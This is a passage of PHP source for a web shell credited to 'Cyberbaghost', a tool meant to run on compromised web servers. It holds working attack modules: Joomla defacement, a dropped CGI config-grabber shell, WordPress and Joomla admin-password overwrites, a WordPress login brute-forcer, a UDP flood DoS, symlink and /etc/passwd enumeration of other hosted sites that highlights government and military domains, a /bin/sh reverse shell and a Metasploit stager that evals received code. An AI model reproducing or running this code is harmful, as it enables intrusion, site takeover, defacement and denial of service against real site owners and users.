echo("<br>[-] Updating Index.php Error");
exit;
}
else {
echo("<br>[~] index.php successfully saved");
}
#################################################################
###################### V1.5 END ######################
#################################################################
}
}
function randomt() {
$chars = "abcdefghijkmnopqrstuvwxyz023456789";
srand((double)microtime()*1000000);
$i = 0;
$pass = '' ;
while ($i <= 7) {
$num = rand() % 33;
$tmp = substr($chars, $num, 1);
$pass = $pass . $tmp;
$i++;
}
return $pass;
}
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
{
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[$i]);
$ar=trim($ar1[0]);
return $ar;
}
}?>
<center><br><br>
<font color="#00ff00" size='+3'><b>+--=[ Automatic Joomla Index Changer ]=--+</b></font><br><br>
</center>
<center><b>
Link of symlink configuration.php of Joomla<br></b>
<FORM action="" method="post">
<input type="hidden" name="form_action" value="1">
<input type="text" class="inputz" size="60" name="file" value="http://site.com/sym/home/user/public_html/configuration.php">
<br>
<br><b>
Admin Control panel url</b><br>
<input type="text" class="inputz" size="40" name="site_url" value="http://site/administrator"><br>
<br><b>
Your Index Code</b>
<br>
<TEXTAREA rows="20" align="center" style="background:black" cols="120" name="code"> your index code
</TEXTAREA>
<br>
<INPUT class="inputzbut" type="submit" value="Lets Go Deface !!!" name="Submit">
</FORM>
</center>
<script language=JavaScript>m='%09%09%09%09%09%09%09%3C/td%3E%0A%09%09%09%09%09%09%3C/tr%3E%0A%09%09%09%09%09%3C/table%3E%0A%09%09%09%09%3C/td%3E%0A%3C/html%3E';d=unescape(m);document.write(d);</script>
<?php
}
///////////////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'config'))
{
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=config" method="post">
<?php
echo "<center/><br/><b><font color=#00ff00>+--==[ Config Shell Priv8 SCR ]==--+</font></b><br><br>";
mkdir('config', 0755);
chdir('config');
$kokdosya = ".htaccess";
$dosya_adi = "$kokdosya";
$dosya = fopen ($dosya_adi , 'w') or die ("Error cuyy!");
$metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .cpc
AddHandler cgi-script .izo
AddHandler cgi-script .izo";
fwrite ( $dosya , $metin ) ;
fclose ($dosya);
$file = fopen("config.izo" ,"w+");
$write = fwrite ($file ,base64_decode($configshell));
fclose($file);
chmod("config.izo",0755);
echo "<iframe src=config/config.izo width=97% height=100% frameborder=0></iframe>
</div>";
}
/////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'wp-reset'))
{
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=wp-reset" method="post">
<?php
echo "<center/><br/><b><font color=#00ff00>+--==[ Wordpress Reset Password ]==--+</font></b><br><br>";
if(empty($_POST['pwd'])){
echo "<FORM method='POST'>
<table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Hostname</td><td>
<input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
<input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
<input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
<input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
<tr><td>&nbsp;&nbsp;User baru</td><td>
<input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
<tr><td>&nbsp;&nbsp;Pass Baru</td><td>
<input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />&nbsp;
<input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
</td></tr> </table><br><br><br><br>
";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$pwd = $_POST['pwd'];
$admin = $_POST['admin'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$hash = crypt($pwd);
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
if($a4s){
echo "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";
}
}
echo "
</div>"; }
elseif(isset($_GET['x']) && ($_GET['x'] == 'jm-reset'))
{
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=jm-reset" method="post">
<?php
echo "<center/><br/><b><font color=#00ff00>+--==[ Joomla Reset Password ]==--+</font></b><br><br>";
if(empty($_POST['pwd'])){
echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
<input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
<input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
<input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
<input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
<tr><td>&nbsp;&nbsp;User baru</td><td>
<input style='width:270px;' class='inputz' name='admin' value='admin' /></td></tr>
<tr><td>&nbsp;&nbsp;pass baru </td><td>123456 =
<input style='width:130px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />&nbsp;
<input style='width:23%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
</td></tr> </table><br><br><br><br>
";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$pwd = $_POST['pwd'];
$admin = $_POST['admin'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$hash = crypt($pwd);
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
if($SQL){
echo "<b>Success : skarang password barunya >>> - (123456)";
}
}
echo "
</div>";
//////////////////////////////////////////////////////////////////////////////
}elseif(isset($_GET['x']) && ($_GET['x'] == 'wpbrute'))
{
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=wpbrute" method="post">
<center>
<br><Br><b><font size='2' >+--=[ Wordpress Brute Force ]=--+</font><br>
<form enctype="multipart/form-data" method="POST">
<table width='624' border='0' class='tabnet' id='Box'>
<tr><th colspan="5">Wordpress Brute Force</th></tr>
<tr>
<td >&nbsp;</td>
<td ><p>Hosts:</p></td>
<td ><p> Users:</p></td>
<td ><p>Passwords:</p></td>
</tr>
<tr>
<td>&nbsp;</td>
<td ><textarea style="background:black;" name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td>
<td ><textarea style="background:black;" name="usernames" cols="30" rows="10" ><?php if($_POST){echo $_POST['usernames'];}else {echo "admin";} ?></textarea></td>
<td ><textarea style="background:black;" name="passwords" cols="30" rows="10" ><?php if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";} ?></textarea></td>
</tr>
<tr><td colspan="4"><input class='inputzbut' type="submit" name="submit" value="Brute Now" />
<?php
if($_POST)
{
$hosts = trim(filter($_POST['hosts']));
$passwords = trim(filter($_POST['passwords']));
$usernames = trim(filter($_POST['usernames']));
if($passwords && $usernames && $hosts)
{
$hosts_explode = explode("\n", $hosts);
$usernames_explode = explode("\n", $usernames);
$passwords_explode = explode("\n", $passwords);
foreach($hosts_explode as $host)
{
$host = RemoveLastSlash($host);
$hacked = 0;
$host = str_replace(array("http://","https://","www."),"",trim($host));
$host = "http://".$host;
$wpAdmin = $host.'/wp-admin/';
if(!url_exists($host."/wp-login.php"))
{echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush();continue;}
foreach($usernames_explode as $username)
{
foreach($passwords_explode as $password)
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php');
curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($ch,CURLOPT_POST,TRUE);
curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri&#8207;"."&redirect_to=".$wpAdmin."&testcookie=1");
$login = curl_exec($ch);
if(eregi ("profile.php",$login) )
{
$hacked = 1;
echo "<p>".$host." => UserName : [<font color='green'>".$username."</font>] : Password : [<font color='green'>".$password."</font>]</p>";
ob_flush();flush();break;
}
}
if($hacked == 1){break;}
}
if($hacked == 0)
{echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();}
}
}
else {echo "<p><font color='red'>All fields are Required ! </font></p>";}
}
?>
</td></tr>
</table></form></center>
<?php
function url_exists($strURL)
{
$resURL = curl_init();
curl_setopt($resURL, CURLOPT_URL, $strURL);
curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
curl_exec ($resURL);
$intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
curl_close ($resURL);
if ($intReturnCode != 200){return false;}
else{return true ;}
}
function filter($string)
{
if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
else{return $string; }
}
function RemoveLastSlash($host)
{
if(strrpos($host, '/', -1) == strlen($host)-1)
{return substr($host,0,strrpos($host, '/', -1));}
else{return $host;}
}
echo "</p>";
}
//////////////////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'dos'))
{
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">
<center><br><br><br>
Your IP: <font color="red"><b><?php echo $my_ip; ?></b></font>&nbsp;(Don't DoS yourself nub)<br><br>
<table class="tabnet" style="width:333px;padding:0 1px;">
<th colspan="5">Ddos Tool</th>
<tr><tr><td>IP Target</td><td>:</td>
<td><input type="text" class="inputz" name="ip" size="48" maxlength="25" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"/>
</td></tr>
<tr><td>Time</td><td>:</td>
<td><input type="text" class="inputz" name="time" size="48" maxlength="25" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';"/>
</td></tr>
<tr><td>Port</td><td>:</td>
<td><input type="text" class="inputz" name="port" size="48" maxlength="5" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"/>
</td></tr></tr></table></b><br>
<input type="submit" class="inputzbut" name="fire" value=" Firee !!! ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser loads.
</center>
</form>
</center>
<?php
$submit = $_POST['fire'];
if (isset($submit)) {
$packets = 0;
$ip = $_POST['ip'];
$rand = $_POST['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_POST['time'];
$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= "X";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
}
}
elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink'))
{
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=symlink" method="post">
<?php
@set_time_limit(0);
echo "<br><br><center><h1>+--=[ Symlink ]=--+</h1></center><br><br><center><div class=content>";
@mkdir('sym',0777);
$htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$write =@fopen ('sym/.htaccess','w');
fwrite($write ,$htaccess);
@symlink('/','sym/root');
$filelocation = basename(__FILE__);
$read_named_conf = @file('/etc/named.conf');
if(!$read_named_conf)
{
echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
}
else
{
echo "<br><br><div class='tmp'><table border='1' bordercolor='#00ff00' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach($read_named_conf as $subject){
if(eregi('zone',$subject)){
preg_match_all('#zone "(.*)"#',$subject,$string);
flush();
if(strlen(trim($string[1][0])) >2){
$UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
$name = $UID['name'] ;
@symlink('/','sym/root');
$name = $string[1][0];
$iran = '\.ir';
$israel = '\.il';
$indo = '\.id';
$sg12 = '\.sg';
$edu = '\.edu';
$gov = '\.gov';
$gose = '\.go';
$gober = '\.gob';
$mil1 = '\.mil';
$mil2 = '\.mi';
$malay = '\.my';
$china = '\.cn';
$japan = '\.jp';
$austr = '\.au';
$porn = '\.xxx';
$as = '\.uk';
$calfn = '\.ca';
if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])
or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])
or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0]))
{
$name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
}
echo "
<tr>
<td>
<div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
</td>
<td>
'.$UID['name']."
</td>
<td>
<a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
</td>
</tr></div> ";
flush();
}
}
}
}
echo "</center></table>";
}
elseif(isset($_GET['x']) && ($_GET['x'] == 'domain'))
{
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=domain" method="post">
<?php
echo '<br><br><center><h1>+--=[ local domain viewer ]=--+</h1></center><br><br><div class=content>';
$file = @implode(@file("/etc/named.conf"));
if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
preg_match_all("#named/(.*?).db#",$file ,$r);
$domains = array_unique($r[1]);
//check();
//if(isset($_GET['ShowAll']))
{
echo "<table align=center border=1 width=59% cellpadding=5>
<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
<tr><td>Domain</td><td>User</td></tr>";
foreach($domains as $domain){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
}
echo "</table>";
}
echo '</div>';
}
//////////////////////////////////////////////////////
/////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'tool'))
{
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=tool" method="post">
<?php
error_reporting(0);
function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));}
$s_my_ip = gethostbyname($_SERVER['HTTP_HOST']);$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "<br><br><br><center><table><div class='mybox' align='center'><td><h2>Reverse shell ( php )</h2><form method='post' actions='?y=<?php echo $pwd;?>&amp;x='tool'><table class='tabnet'><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' name='rstarget4' value='".$rstarget4."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='sqlportb4' value='".$rsportb4."' /></td></tr></table><input type='submit' name='xback_php' class='inputzbut' value='connect' style='width:120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden' name='d' value='".$pwd."' /></form></td><td><hr color='#4C83AF'><td><td><form method='POST'><table class='tabnet'><h2>Metasploit Connection </h2><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' size='40' name='yip' value='".$my_ip."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' size='5' name='yport' value='443' /></td></tr></table><input class='inputzbut' type='submit' value='Connect' name='metaConnect' style='width:120px;height:30px;margin:10px 2px 0 2px;'></form></td></div></center></table><br><br />";
echo $s_result;
if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case 'socket': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a['len'];$buffer = '';while (strlen($buffer) < $len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}}
if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']);
if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']);
if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork();
if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;}
umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1);
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if(!is_resource($process)) exit(1);
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}
if(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}
if(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}
}
////////////////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'whois'))
{
?>
<form action="?y=<?php echo $pwd; ?>&x=whois" method="post">
<?php
@set_time_limit(0);
@error_reporting(0);
function sws_domain_info($site)
{
$getip = @file_get_contents("http://networktools.nl/whois/$site");
flush();
$ip = @findit($getip,'<pre>','</pre>');
return $ip;
flush();
}
function sws_net_info($site)
{
$getip = @file_get_contents("http://networktools.nl/asinfo/$site");
$ip = @findit($getip,'<pre>','</pre>');
return $ip;
flush();
}
function sws_site_ser($site)
{
$getip = @file_get_contents("http://networktools.nl/reverseip/$site");
$ip = @findit($getip,'<pre>','</pre>');
return $ip;
flush();
}
function sws_sup_dom($site)
{
$getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
$ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
return $ip;
flush();
}
function sws_port_scan($ip)
{
$list_post = array('80','21','22','2082','25','53','110','443','143');
foreach ($list_post as $o_port)
{
$connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
if($connect)
{
echo " $ip : $o_port ??? <u style=\"color: #00ff00\">Open</u> <br /><br />";
flush();
}
}
}
function findit($mytext,$starttag,$endtag) {
$posLeft = @stripos($mytext,$starttag)+strlen($starttag);
$posRight = @stripos($mytext,$endtag,$posLeft+1);
return @substr($mytext,$posLeft,$posRight-$posLeft);
flush();
}
echo '<br><br><center>';
echo '
<br />
<div class="sc"><form method="post"><table class="tabnet">
<tr><th colspan="5">Website Whois</th></tr>
<tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:#00ff00;background-color:#000000" class="inputz" value="site.com" /> &nbsp <input class="inputzbut" type="submit" style="color:#00ff00;background-color:#000000" name="scan" value="Scan !" /></td></tr>
</table></form></div>';
if(isset($_POST['scan']))
{
$site = @htmlentities($_POST['site']);
if (empty($site)){die('<br /><br /> Not add IP .. !');}
$ip_port = @gethostbyname($site);
echo "
<br /><div class=\"sc2\">Scanning [ $site ip $ip_port ] ... </div>
<div class=\"tit\"> <br /><br />|-------------- Port Server ------------------| <br /></div>
<div class=\"ru\"> <br /><br /><pre>
";
echo "".sws_port_scan($ip_port)." </pre></div> ";
flush();
echo "<div class=\"tit\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
<div class=\"ru\">
<pre>".sws_domain_info($site)."</pre></div>";
flush();
echo "
<div class=\"tit\"> <br /><br />|-------------- Network Info ------------------| <br /></div>
<div class=\"ru\">
<pre>".sws_net_info($site)."</pre> </div>";
flush();
echo "<div class=\"tit\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
<div class=\"ru\">
<pre>".sws_sup_dom($site)."</pre> </div>";
flush();
echo "<div class=\"tit\"> <br /><br />|-------------- Site Server ------------------| <br /></div>
<div class=\"ru\">
<pre>".sws_site_ser($site)."</pre> </div>
<div class=\"tit\"> <br /><br />|-------------- END ------------------| <br /></div>";
flush();
}
echo '</center>';
}
///////////////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'about'))
{
?>
<form action="?y=<?php echo $pwd; ?>&x=about" method="post">
<center><br><br><img src='https://fbcdn-photos-e-a.akamaihd.net/hphotos-ak-xpf1/t1.0-0/10361054_1415888695362637_985793837310088287_n.jpg'width=162 height=123 ><br> Cyberbaghost shell created by Hsep4 aka cyberbaghost<br>logo design by roy<br> thanks to Adi Rahadian that helped me add a feature <br> and thanks to Hantu Dunia Maya which helps find bug in the previous shell cyberbaghost
<br><br><br>thank you to those who helped and inspired me in making cyberbaghost shell
<br><br>[ Imron aka Santri_ndablek | Om_kucing | Grenalio Kristian Perdana Siahaan | roy | Hantu Dunia Maya | Adi Rahadian | M4CHO | D'Kalimantanz | Pembuat shell B374K | Ismail | Gandrunx ]<br>
and all my friends
<br><br><font size="5" color="#00ff00">Tanks to:</font></center><center>
<marquee direction="up" scrollamount="2" bgcolor="" width="250" height="40"><center>
<p><b><font size="3" color="#00ff00">=[ my friends ]=<br><br>imron<br>roy<br>macho<br>iqbal<br>
and all my friends<br><br>
=[ group hacking ]=<br><br>
Warcops Cyber Team [RIP]<br>
Gaeruda Fighter Indonesia<br>
and all group hacking<br>
<br><br><br>By<br>Hsep4 a.k.a Cyberbaghost <br><br><br>
</font></b></p>
</center>
</marquee></center><br><br><br><?php
}
///////////////////////////////////////////////////////////////////////////
elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){ @ini_set('output_buffering',0);
?>
<form action="?y=<?php echo $pwd; ?>&x=jumping" method="post">
<br><br><center><b><font size=4>+--=[ Jumping ]=--+</font></b></center><br><br>
<?php
echo "<table class=\"cmdbox\"><tr><td colspan=\"2\">";
($sm = ini_get('safe_mode') == 0) ?
$sm = 'off': die("<b><blink><font style='color:#ff0000'>[-] ERROR</font></blink>&nbsp;: &nbsp;&nbsp;Safe_mode = On </b></td></tr></table>
<br><br><br><br><center><div class=\"info\"><b>[__1n73ction Shell V3.3 Spesial Edition__]</div>
<br><br><div class=\"jaya\"> &copy; ".date('Y',time())." X'1N73CT </b></div></center>");
set_time_limit(0);
echo "<table class=\"cmdbox\"><tr><td colspan=\"2\">";
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die ("<b><blink><font style='color:#ff0000'>[-] ERROR</font></blink>&nbsp; : &nbsp;&nbsp; I Can't Read [ /etc/passwd ]</b></td></tr></table>
<br><br><br><br><center><div class=\"info\"><b>[__1n73ction Shell V3.3 Spesial Edition__]</div>
<br><br><div class=\"jaya\"> &copy; ".date('Y',time())." X'1N73CT </b></div></center>"); }
echo "<table class=tabnet><tr><td>Status</td><td>Directory</td></tr>";
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd)){
$str = fgets($passwd);
if ($i > 10000){ $pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if (($username != '')){ if (is_readable($dirz)){ array_push($users,$username);
array_push($pub,$dirz); } } } $i++; }
foreach ($users as $user){
echo '<tr><td> &nbsp;&nbsp;[Found !]&nbsp;&nbsp; </td><td> <a href="?y=/home/'.$user.'/public_html">/home/'.$user.'/public_html/</a><td></tr>'; }
echo "</table>";
} elseif(isset($_GET['x']) && ($_GET['x'] == 'donasi'))
{
?>
<form action="?y=<?php echo $pwd; ?>&x=about" method="post">
<center>Apabila yang saya kreasikan bermanfaat dan berguna bagi anda dan anda ingin menberikan donasi kepada saya saya akan sangat berterimakasih guna untuk mendukung cyberbaghost shell terbaru nanti.Donasi bisa berupa pulsa,cpanel,hosting dll anda bisa kontak ke akun saya baik di twitter maupun facebook dan sebagai penghargaan nama anda akan saya cantumkan di shell versi saya berikutnya. Terimakasih Atas kebaikan Anda semoga Tuhan Membalas kebaikan anda.<br><br>Donation, cpanel, hosting, etc., you can contact me on twitter and facebook accounts, and as a gift I will write your name in the next version of the shell. Thank you for your kindness<br><?php
} elseif(isset($_GET['x']) && ($_GET['x'] == 'tdonasi'))
{
?>
<form action="?y=<?php echo $pwd; ?>&x=about" method="post">
<center> ^_^<br><br><br><?php
} elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){
if(isset($_POST['uploadcomp'])){
if(is_uploaded_file($_FILES['file']['tmp_name'])){
$path = magicboom($_POST['path']);
$fname = $_FILES['file']['name'];
$tmp_name = $_FILES['file']['tmp_name'];
$pindah = $path.$fname;
$stat = @move_uploaded_file($tmp_name,$pindah);
if ($stat) {
$msg = "file uploaded to $pindah";
}
else $msg = "failed to upload $fname";
}
else $msg = "failed to upload $fname";
}
elseif(isset($_POST['uploadurl'])){
$pilihan = trim($_POST['pilihan']);
$wurl = trim($_POST['wurl']);
$path = magicboom($_POST['path']);
$namafile = download($pilihan,$wurl);
$pindah = $path.$namafile;
if(is_file($pindah)) {
$msg = "file uploaded to $pindah";
}
else $msg = "failed to upload $namafile";
}
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">
<table class="tabnet" style="width:320px;padding:0 1px;">
<tr><th colspan="2">Upload from computer</th></tr>
<tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
</tr>
</table></form>
<table class="tabnet" style="width:320px;padding:0 1px;">
<tr><th colspan="2">Upload from url</th></tr>
